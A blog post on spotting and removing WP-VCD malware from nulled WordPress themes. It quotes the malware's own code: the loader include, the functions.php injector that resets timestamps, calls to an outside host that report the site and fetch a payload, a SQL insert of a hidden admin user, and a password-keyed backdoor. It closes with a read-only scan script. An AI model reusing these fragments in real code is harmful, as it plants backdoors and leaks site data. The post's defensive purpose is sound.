WP-VCD Malware Attack on Your WordPress Blog or Websites


Some of the "free premium" WordPress themes and plugins shared on nulled-software websites have been found to carry the WP-VCD malware, which injects on-click ads. In this post we share some quick tips on how to detect and clean this malware from a theme or plugin downloaded from such sites, because it is spreading now.

How to clean your theme or plugin from WP-VCD Malware Attack

Step 1

Check the functions.php file in the theme directory.

If you find code like this:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

you should remove or delete it, because class.theme-modules.php contains the encrypted malware payload.

Step 2

If you activate the theme without removing the malware, it will infect your WordPress core files. First, the malware creates a file wp-vcd.php in the wp-includes folder. The wp-vcd.php file starts with a long base64-encoded string named $install_code:

$install_code = 'PD9waHANCg0KaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pIC[...]
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}', $install_hash, base64_decode($install_code));

This file injects the code from the decoded string at the top of the theme's functions.php, then resets the file's modification date and time:

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) {
    if (strpos($content, 'WP_V_CD') === false) {
        $content = $install_code . $content;
        @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
        touch($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $time);
    } else {
        $ping = false;
    }
}

It then reports the hostname and the generated password to code.php on a remote server (populating the attacker's database of injected sites), and downloads the content of a remote text file into class.wp.php:

$content = @file_get_contents('http://www.derna.top/code.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
@file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.derna.top/code.php'));

class.wp.php then tries to insert a user into the WordPress database:

$wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('100010010', '100010010', '\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.', '100010010', '[email protected]', '', '2011-06-07 00:00:00', '', '0', '100010010');");

To clean up, delete the files wp-vcd.php and class.wp.php, and remove the callback that was added on the first line of wp-includes/post.php:

<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?>

Then check your theme's functions.php, because the malware has added its code there as well. Remove the block that begins with

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '17a6d0135359512f9fc543b4e9d97596')) {
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action']) {
        case 'change_domain';
            if (isset($_REQUEST['newdomain'])) {
                if (!empty($_REQUEST['newdomain'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
                            $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;
        case 'change_code';
            if (isset($_REQUEST['newcode'])) {
                if (!empty($_REQUEST['newcode'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
                            $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
[......]
?>

and everything after it, up to the closing tag of the malware block.
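The checks from Step 1 and Step 2 can be scripted so that every theme on a site is covered in one pass. The script below is an added example, not code from the original post: it only reports the indicators named above (the dropped files, the post.php callback, the theme loader line and the injected block) and writes nothing, and the infected tree it scans is a constructed fixture, not a real site.

```shell
#!/bin/sh
# Added example, not code from the original post: a read-only scan for the
# WP-VCD indicators listed above. Nothing is deleted; review each hit by hand.
wpvcd_scan() {
    root="$1"
    # 1. Files the malware drops into wp-includes
    for f in wp-includes/wp-vcd.php wp-includes/class.wp.php; do
        [ -f "$root/$f" ] && echo "WPVCD dropped file: $f"
    done
    # 2. The include_once callback on the first line of wp-includes/post.php
    if [ -f "$root/wp-includes/post.php" ] &&
       head -n 1 "$root/wp-includes/post.php" | grep -q 'wp-vcd\.php'; then
        echo "WPVCD hook: wp-includes/post.php (line 1)"
    fi
    # 3. Per theme: dropped loader file, loader line, injected backdoor block
    for t in "$root"/wp-content/themes/*/; do
        [ -d "$t" ] || continue
        n=$(basename "$t")
        [ -f "$t/class.theme-modules.php" ] &&
            echo "WPVCD dropped file: themes/$n/class.theme-modules.php"
        [ -f "$t/functions.php" ] || continue
        grep -q 'class\.theme-modules\.php' "$t/functions.php" &&
            echo "WPVCD loader: themes/$n/functions.php"
        grep -Eq 'WP_V_CD|div_code_name="wp_vcd"' "$t/functions.php" &&
            echo "WPVCD backdoor: themes/$n/functions.php"
    done
    return 0
}
# Number of indicator lines under a WordPress root (0 when clean).
wpvcd_count() {
    wpvcd_scan "$1" | grep -c '^WPVCD' || true
}
# Constructed infected tree for the demo (not a real site): the dropped files
# are one-line placeholders that carry only the marker strings from the post.
wpvcd_make_fixture() {
    root="$1"; t="$root/wp-content/themes/nulled-theme"
    mkdir -p "$root/wp-includes" "$t"
    cat > "$root/wp-includes/post.php" <<'EOF'
<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?>
EOF
    echo '<?php // placeholder for the dropper' > "$root/wp-includes/wp-vcd.php"
    echo '<?php // placeholder for the user injector' > "$root/wp-includes/class.wp.php"
    echo '<?php // placeholder for the encoded payload' > "$t/class.theme-modules.php"
    cat > "$t/functions.php" <<'EOF'
<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>
<?php $div_code_name="wp_vcd"; // WP_V_CD marker left by the injector
EOF
}
```

Run `wpvcd_scan /path/to/wordpress` against a real install; the injected database user from Step 2 is not visible on disk, so also check wp_users for the ID or login 100010010 shown above.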

Conclusion

Although WP-VCD is not a particularly dangerous piece of malware, extra care is needed to avoid falling victim to this kind of attack, even with an up-to-date WordPress install.

Keep a firewall with core file change monitoring in place, and always keep your themes updated.

This malware has been observed propagating across shared hosting where multiple WordPress installations sit under the same root directory (cross-site contamination).

It has been reported that the infection sometimes comes from nulled WordPress themes and plugins.

Author: Pardeep Patel (https://pardeeppatel.com/)